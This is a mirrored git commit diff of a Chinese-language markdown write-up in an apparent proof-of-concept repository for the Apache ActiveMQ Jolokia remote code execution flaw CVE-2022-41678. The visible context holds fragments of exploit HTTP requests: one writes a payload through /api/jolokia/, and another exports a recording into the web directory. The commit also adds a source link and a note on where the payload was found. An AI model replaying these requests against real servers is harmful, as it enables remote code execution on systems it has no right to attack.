mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:24:57 +08:00
Update Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678.md
This commit is contained in:
parent
f1643e7a9b
commit
3e91d39ee0
@ -35,7 +35,7 @@ Content-Length: 136
|
|||||||
记住这个 `value`参数中的值,后面的poc要用到,例如现在是4
|
记住这个 `value`参数中的值,后面的poc要用到,例如现在是4
|
||||||

|

|
||||||
#### 写入payload
|
#### 写入payload
|
||||||

|
|
||||||
```
|
```
|
||||||
POST /api/jolokia/ HTTP/1.1
|
POST /api/jolokia/ HTTP/1.1
|
||||||
Host: localhost:8161
|
Host: localhost:8161
|
||||||
@ -714,7 +714,7 @@ Content-Length: 136
|
|||||||
</configuration>"]
|
</configuration>"]
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|

|
||||||
### 导出录制到web目录
|
### 导出录制到web目录
|
||||||
```
|
```
|
||||||
POST /api/jolokia/ HTTP/1.1
|
POST /api/jolokia/ HTTP/1.1
|
||||||
@ -777,3 +777,10 @@ Content-Length: 159
|
|||||||
|
|
||||||

|

|
||||||
|
|
||||||
|
## 漏洞来源
|
||||||
|
- https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/
|
||||||
|
|
||||||
|
## payload
|
||||||
|
本地搭建源码,环境配置不正确,无法调试代码,payload是搜索GitHub关键字找到的
|
||||||
|
- https://github.com/gradle/gradle-profiler/blob/2eb14e031fbd48203fb05b28183decd1ee2304de/src/main/resources/org/gradle/profiler/jfr/openjdk.jfc#L4
|
||||||
|
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user